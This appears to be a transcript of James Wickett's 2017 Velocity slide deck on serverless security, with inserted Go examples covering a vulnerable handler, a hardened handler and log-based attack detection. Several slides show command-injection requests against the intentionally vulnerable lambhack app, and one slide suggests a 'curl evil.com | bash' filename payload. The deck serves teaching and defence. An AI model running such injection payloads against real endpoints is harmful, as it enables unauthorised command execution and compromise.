Talk given at O'Reilly's 2017 Velocity Conference in San Jose.
Serverless is the design pattern for writing applications at scale without the necessity of managing infrastructure. This is done across the continuum of the cloud—from storage as a service to database as a service—but the center of serverless is functions as a service (FaaS). (Current FaaS offerings include AWS Lambda, Azure Functions, and Google Cloud Functions.) Now processes run for milliseconds before being destroyed and then get instantiated for subsequent requests.
Serverless adds simplicity and a new economic model to cloud computing, but it creates some unique security challenges. In serverless architectures, technologies like antivirus and intrusion detection become meaningless. James Wickett explores practical security approaches for serverless in four key areas—the software supply chain, the delivery pipeline, data flow, and attack detection—and examines how traditional approaches need to be adapted to serverless.
Even if you don’t have any experience with serverless, don’t worry; this session starts with the basics. You’ll learn what serverless is (hint: it’s still being defined) and practical patterns for serverless adoption.
Serverless Security: A pragmatic primer for builders and defenders
1. Velocity San Jose 2017 @WICKETT
SERVERLESS SECURITY:
A PRAGMATIC PRIMER
FOR BUILDERS AND
DEFENDERS
JAMES WICKETT
2. Velocity San Jose 2017 @WICKETT
WANT THE SLIDES
RIGHT NOW?
Send an email to
james@signalsciences.com
3. Velocity San Jose 2017 @WICKETT
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ AUTHOR DEVOPS FUNDAMENTALS AT
LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND
LABS.SIGNALSCIENCES.COM
JAMES WICKETT
4. Velocity San Jose 2017 @WICKETT
Don’t worry, this is not a
thinly veiled vendor pitch.
5. Velocity San Jose 2017 @WICKETT
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY
UNITS, COUPLED WITH THIRD PARTY SERVICES THAT
ALLOW RUNNING END-TO-END APPLICATIONS
WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
6. Velocity San Jose 2017 @WICKETT
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
  ‣ SOFTWARE SUPPLY CHAIN SECURITY
  ‣ DELIVERY PIPELINE SECURITY
  ‣ DATA FLOW SECURITY
  ‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE
PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
17. Velocity San Jose 2017 @WICKETT
‣ 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION
SERVICES RUN BY THIRD PARTIES
‣ LATE 2014 - AWS LAUNCHED LAMBDA
‣ JULY 2015 - AWS LAUNCHED API GATEWAY
‣ OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY
USING AWS LAMBDA
‣ 2015 TO PRESENT - FRAMEWORKS FORMING
‣ 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED
‣ 2016 - SERVERLESS CONFERENCES STARTED
HISTORY OF SERVERLESS
18. Velocity San Jose 2017 @WICKETT
[Chart: Hardware, VMs and Serverless plotted against Waste and Value; inspiration from @adrianco]
19. Velocity San Jose 2017 @WICKETT
Decomposed
Microservice
Architecture
25. Velocity San Jose 2017 @WICKETT
SERVERLESS IS AN
OPINIONATED
FRAMEWORK FOR
COMPUTE AND
CONTAINERS
26. Velocity San Jose 2017 @WICKETT
If you want to lead your
company bravely into the new
world, you would do well to
focus a lot on how serverless will
evolve.
- @Cloudopinion
https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
27. Velocity San Jose 2017 @WICKETT
THE CLOUD WAS TO
VIRTUALIZATION AS
SERVERLESS WILL BE TO
CONTAINERS
28. Velocity San Jose 2017 @WICKETT
Serverless encourages functions
as deploy units, coupled with
third party services that allow
running end-to-end applications
without worrying about system
operation.
SERVERLESS DEFINITION
42. Velocity San Jose 2017 @WICKETT
‣ APP NEEDS LARGE LOCAL DISK SPACE
‣ LONG RUNNING JOBS
‣ BIG I/O TASKS
‣ LATENCY SENSITIVE REQUESTS THAT CAN’T
WAIT FOR THE COLD-STARTUP TIME
SERVERLESS DEAL KILLERS (PROBABLY)
52. Velocity San Jose 2017 @WICKETT
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN
BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH
A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER
AWS SERVICES YOUR APP CONSUMES
GO SPARTA
53. Velocity San Jose 2017 @WICKETT
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS,
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
54. Velocity San Jose 2017 @WICKETT
‣ BUILD A WORD CLOUD GENERATOR
‣ ABLE TO CONSUME 3RD PARTY APIS FOR TEXT
SOURCES
‣ RETURN JSON WITH COUNTS OF WORDS IN
TEXT
‣ KEEP IT SIMPLE
STEP 2: IDEA!
55. Velocity San Jose 2017 @WICKETT
‣ (USING GO SPARTA FOR THE FRAMEWORK)
‣ LAMBDA
‣ S3
‣ API GATEWAY
STEP 3: DESIGN AND
ARCHITECTURE
74. Velocity San Jose 2017 @WICKETT
‣ SECURE SOFTWARE SUPPLY CHAIN
‣ DELIVERY PIPELINE
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
FOUR AREAS OF
SERVERLESS SECURITY
76. Velocity San Jose 2017 @WICKETT
‣ THE CODE YOU WRITE (AND LIBS) IS YOUR
SURFACE AREA NOW
‣ CHANGE FROM THE PAST (E.G. SHELLSHOCK,
HEARTBLEED) OF THE NUMEROUS FIREDRILLS
OUR INDUSTRY HAD TO ENDURE DUE TO
INHERITANCE
SURFACE AREA REDUCTION
77. Velocity San Jose 2017 @WICKETT
‣ TLS CONTROL TO THE PROVIDER
‣ ROUTING CONTROL TO THE PROVIDER
‣ CONSUMPTION OF THIRD PARTY SERVICES
‣ IAM ROLES AND POLICY CONFUSION
SURFACE AREA EXPANSION
83. Velocity San Jose 2017 @WICKETT
Lambda + S3 + Kinesis + DynamoDB + CloudFormation + API Gateway + Auth0
SERVICE AND 3RD PARTY EXPANSION
84. Velocity San Jose 2017 @WICKETT
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
IAM ROLES AND POLICIES
85. Velocity San Jose 2017 @WICKETT
Recommendation:
Use a third-party service
to monitor for provider
config changes
86. Velocity San Jose 2017 @WICKETT
‣ DISABLE ROOT ACCESS KEYS
‣ MANAGE USERS WITH PROFILES
‣ SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM
‣ SECURE KEYS IN DEV SYSTEM
‣ USE PROVIDER MFA
USE GOOD HYGIENE WITH
YOUR PROVIDER
91. Velocity San Jose 2017 @WICKETT
UNIT TESTING EVEN
MORE CRITICAL AS
INTEGRATION
TESTING IN DEV IS
HARDER
92. Velocity San Jose 2017 @WICKETT
‣ USE OF A STAGING OR PRE-PROD ENV
‣ END TO END SYNTHETIC INTEGRATION TESTS
‣ ALL THE USUAL SUSPECTS
INTEGRATION TESTING
94. Velocity San Jose 2017 @WICKETT
‣ ONLY DEV KEYS CAN PUSH TO ‘DEV’
‣ ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE-
PROD
‣ INTEGRATION TESTS MUST PASS IN THIS ENV
‣ SECURITY VALIDATION MUST TAKE PLACE BEFORE
PROMOTION
‣ ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM
GOOD PIPELINE PRACTICES
96. Velocity San Jose 2017 @WICKETT
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
GAUNTLT WORKSHOP IN 9 EXAMPLES
97. Velocity San Jose 2017 @WICKETT
DATA FLOW
‣ DEVELOPMENT
  ‣ DATA FLOW DIAGRAMS
  ‣ THREAT MODELING
‣ RUNTIME
  ‣ LOGGING
  ‣ CUSTOM MONITORS/METRICS
98. Velocity San Jose 2017 @WICKETT
Your provider is responsible for
the underlying infrastructure
and services. You are
responsible for ensuring you use
the services in a secure manner.
https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
99. Velocity San Jose 2017 @WICKETT
‣ SPOOFING CONSUMED RESOURCES
‣ DENIAL OF SERVICE
‣ TIMEOUTS
‣ EXECUTION RESTRICTIONS FOR RESOURCES
‣ CAPACITY ISSUES
DATA FLOW SECURITY
104. Velocity San Jose 2017 @WICKETT
APPSEC GREATEST HITS
(XSS, SQLI, CMDEXE) STILL
RELEVANT 15 YEARS
LATER!
105. Velocity San Jose 2017 @WICKETT
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO MAKE THE POINT THAT APPSEC IS
RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS
GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
106. Velocity San Jose 2017 @WICKETT
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A
QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED
AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
107. Velocity San Jose 2017 @WICKETT
lambhack is a vulnerable
serverless lambda application
It would certainly be a bad idea
to base any coding patterns off
what you see here.
109. Velocity San Jose 2017 @WICKETT
BAD CODE IS BAD CODE
EVEN IN SERVERLESS…
command := lambdaEvent.QueryParams["args"]
output := runner.Run(command)
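The two lines above are the whole defect: a query-string value becomes a command. As an added example (not code from lambhack, Sparta, or the talk), the Go below puts that vulnerable shape beside a hardened handler that uses the request value only as a lookup key into a fixed allow-list and executes the chosen argv without a shell, plus a small detection hook that flags shell metacharacters in the raw parameter so such requests get logged. The Event type, its QueryParams field, and the allowedActions table are assumptions made for this example.

```go
package main

import (
	"fmt"
	"os/exec"
	"strings"
)

// Event stands in for the request the handler receives. The type name and
// the QueryParams field are assumptions for this example, not lambhack's or
// Sparta's real types.
type Event struct {
	QueryParams map[string]string
}

// vulnerableRun reproduces the pattern on the slide: whatever arrives in
// ?args= is handed to a shell, so "uname -a; sleep 1" executes as written.
// It is kept only to contrast with the hardened handler and is never called.
func vulnerableRun(ev Event) (string, error) {
	command := ev.QueryParams["args"]
	out, err := exec.Command("sh", "-c", command).CombinedOutput()
	return string(out), err
}

// allowedActions is the complete set of operations the endpoint exposes.
// Each key maps to a fixed argv; request data never becomes a command string.
// The table contents are made up for this example.
var allowedActions = map[string][]string{
	"kernel": {"uname", "-r"},
	"tmp":    {"ls", "-la", "/tmp"},
}

// hardenedArgv uses the ?action= value only as a lookup key into the
// allow-list and rejects anything else, so there is no string to inject into.
func hardenedArgv(ev Event) ([]string, error) {
	action := ev.QueryParams["action"]
	argv, ok := allowedActions[action]
	if !ok {
		return nil, fmt.Errorf("unknown action %q", action)
	}
	return argv, nil
}

// hardenedRun executes the selected argv directly, without a shell, so
// metacharacters in the request cannot chain or substitute commands.
func hardenedRun(ev Event) (string, error) {
	argv, err := hardenedArgv(ev)
	if err != nil {
		return "", err
	}
	out, err := exec.Command(argv[0], argv[1:]...).CombinedOutput()
	return string(out), err
}

// looksInjected is a cheap detection hook: a legitimate client of this
// endpoint never sends shell metacharacters, so their presence is worth a
// log line and a metric even though the hardened handler already refuses them.
func looksInjected(param string) bool {
	return strings.ContainsAny(param, ";|&`$<>\n")
}

func main() {
	// The same value the slide sends to lambhack, presented to the hardened handler.
	hostile := Event{QueryParams: map[string]string{"action": "uname -a; sleep 1"}}
	if looksInjected(hostile.QueryParams["action"]) {
		fmt.Println("ALERT: shell metacharacters in request parameter")
	}
	if _, err := hardenedRun(hostile); err != nil {
		fmt.Println("hardened handler refused:", err)
	}
	out, _ := hardenedRun(Event{QueryParams: map[string]string{"action": "kernel"}})
	fmt.Print("hardened handler output: ", out)
}
```

Keeping the allow-list lookup (hardenedArgv) separate from execution (hardenedRun) lets the policy be unit tested without running anything, which matters in serverless where the integration environment is harder to reach.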
110. Velocity San Jose 2017 @WICKETT
With command execution
available to us in
lambhack, we can poke
around the container a bit
111. Velocity San Jose 2017 @WICKETT
UNAME -A
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
112. Velocity San Jose 2017 @WICKETT
CAT /PROC/VERSION
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1"
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
113. Velocity San Jose 2017 @WICKETT
LET’S LOOK IN /TMP
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
> total 17916
drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 .
drwxr-xr-x 21 root root 4096 Feb 8 21:47 ..
-rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
114. Velocity San Jose 2017 @WICKETT
LAMBDA REUSE IN ACTION!
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64
wickettfile
115. Velocity San Jose 2017 @WICKETT
WHICH CURL
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"
> /usr/bin/curl
116. Velocity San Jose 2017 @WICKETT
‣ ADD XSS
‣ ADD OTHER INJECTION ATTACKS
‣ ADD AUTH VECTORS
‣ …
‣ PULL REQUESTS ACCEPTED :)
FUTURE OF LAMBHACK
117. Velocity San Jose 2017 @WICKETT
‣ LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO
‣ MONITORING/LOGGING PLAYS A KEY ROLE HERE
‣ DETECT LONGER RUN TIMES
‣ HIGHER ERROR RATE OCCURRENCES
‣ DATA INGESTION
‣ LOG ACTIONS OF LAMBDAS
APPSEC THOUGHTS
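The "detect longer run times" and "higher error rate occurrences" bullets above are the cheapest attack signals a function emits, because a command-injection payload like the ones shown earlier adds seconds to an invocation and often fails. As an added example (not from the talk or lambhack), the Go below scans CloudWatch-style Lambda log lines and raises a finding for any invocation over a duration threshold and one aggregate finding when the error ratio crosses a limit. The REPORT line layout with its Duration field is what Lambda writes to CloudWatch; the START line, the two error lines, the request ids, the timestamps and the thresholds are constructed sample data for this example.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// sampleLog is constructed for this example. REPORT lines follow the real
// CloudWatch Lambda format; the timestamps, request ids and the two error
// lines are made up to model one timeout and one runtime error in five calls.
var sampleLog = strings.Join([]string{
	"START RequestId: 11111111-aaaa-4bbb-8ccc-000000000001 Version: $LATEST",
	"REPORT RequestId: 11111111-aaaa-4bbb-8ccc-000000000001\tDuration: 3.21 ms\tBilled Duration: 100 ms\tMemory Size: 128 MB\tMax Memory Used: 24 MB",
	"REPORT RequestId: 11111111-aaaa-4bbb-8ccc-000000000002\tDuration: 4.02 ms\tBilled Duration: 100 ms\tMemory Size: 128 MB\tMax Memory Used: 24 MB",
	"2017-06-20T18:00:03.000Z 11111111-aaaa-4bbb-8ccc-000000000003 Task timed out after 3.00 seconds",
	"REPORT RequestId: 11111111-aaaa-4bbb-8ccc-000000000003\tDuration: 3003.18 ms\tBilled Duration: 3100 ms\tMemory Size: 128 MB\tMax Memory Used: 25 MB",
	"REPORT RequestId: 11111111-aaaa-4bbb-8ccc-000000000004\tDuration: 3.77 ms\tBilled Duration: 100 ms\tMemory Size: 128 MB\tMax Memory Used: 24 MB",
	"2017-06-20T18:00:05.000Z 11111111-aaaa-4bbb-8ccc-000000000005 ERROR runner failed: exit status 127",
	"REPORT RequestId: 11111111-aaaa-4bbb-8ccc-000000000005\tDuration: 12.40 ms\tBilled Duration: 100 ms\tMemory Size: 128 MB\tMax Memory Used: 24 MB",
}, "\n")

// reportRe captures the request id and the Duration field of a REPORT line.
var reportRe = regexp.MustCompile(`^REPORT RequestId: (\S+)\s+Duration: ([0-9.]+) ms`)

// Finding is one alert; RequestID is "*" for aggregate findings.
type Finding struct {
	RequestID string
	Reason    string
}

// Stats summarises what was seen in the scanned window.
type Stats struct {
	Invocations int
	Errors      int
	MaxMs       float64
}

// isErrorLine keys on the runtime's timeout message and on a constructed
// " ERROR " marker; a real deployment would match its own error format.
func isErrorLine(line string) bool {
	return strings.Contains(line, "Task timed out") || strings.Contains(line, " ERROR ")
}

// analyze walks the log once, counting invocations (one per REPORT line)
// and error lines, and returns findings for slow calls and for a high
// error ratio.
func analyze(logText string, maxMs, maxErrorRate float64) ([]Finding, Stats) {
	var st Stats
	var findings []Finding
	sc := bufio.NewScanner(strings.NewReader(logText))
	for sc.Scan() {
		line := sc.Text()
		if m := reportRe.FindStringSubmatch(line); m != nil {
			ms, err := strconv.ParseFloat(m[2], 64)
			if err != nil {
				continue
			}
			st.Invocations++
			if ms > st.MaxMs {
				st.MaxMs = ms
			}
			if ms > maxMs {
				findings = append(findings, Finding{m[1], fmt.Sprintf("duration %.0f ms exceeds %.0f ms", ms, maxMs)})
			}
			continue
		}
		if isErrorLine(line) {
			st.Errors++
		}
	}
	if st.Invocations > 0 {
		rate := float64(st.Errors) / float64(st.Invocations)
		if rate > maxErrorRate {
			findings = append(findings, Finding{"*", fmt.Sprintf("error rate %.2f exceeds %.2f", rate, maxErrorRate)})
		}
	}
	return findings, st
}

func main() {
	findings, st := analyze(sampleLog, 1000, 0.2)
	fmt.Printf("invocations=%d errors=%d max=%.2f ms\n", st.Invocations, st.Errors, st.MaxMs)
	for _, f := range findings {
		fmt.Printf("FINDING %s: %s\n", f.RequestID, f.Reason)
	}
}
```

The thresholds are deliberately tied to this function's own baseline rather than to any fixed number: a word-count function that normally finishes in a few milliseconds makes a 3 second invocation stand out, while the same value would be normal for a function that calls several third-party APIs.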
118. Velocity San Jose 2017 @WICKETT
APPLICATION SECURITY IS
STILL RELEVANT
119. Velocity San Jose 2017 @WICKETT
‣ New surface area, similar appsec problems
  ‣ Command Exec
  ‣ XSS
  ‣ Injection Attacks
‣ Try new things, e.g. appending 'curl evil.com | bash' or <script>alert(1)</script> to a filename you upload on S3
TYPES OF ATTACKS
120. Velocity San Jose 2017 @WICKETT
‣ LOGGING, EMITTING EVENTS
‣ USAGE METRICS
‣ VANDIUM (SQLI) WRAPPER
‣ CONTENT SECURITY POLICY (CSP)
‣ MORE THINGS NEED TO BE DONE HERE…
DEFENSE
121. Velocity San Jose 2017 @WICKETT
Development in serverless is
easier than ever, attracting new
developers to web development;
as a result, application security
will see a rise.
FINAL THOUGHT
123. Velocity San Jose 2017 @WICKETT
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY
UNITS, COUPLED WITH THIRD PARTY SERVICES THAT
ALLOW RUNNING END-TO-END APPLICATIONS
WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
124. Velocity San Jose 2017 @WICKETT
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
  ‣ SOFTWARE SUPPLY CHAIN SECURITY
  ‣ DELIVERY PIPELINE SECURITY
  ‣ DATA FLOW SECURITY
  ‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE
PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
125. Velocity San Jose 2017 @WICKETT
WANT THE SLIDES RIGHT
NOW OR HAVE QUESTIONS?
Send an email to
james@signalsciences.com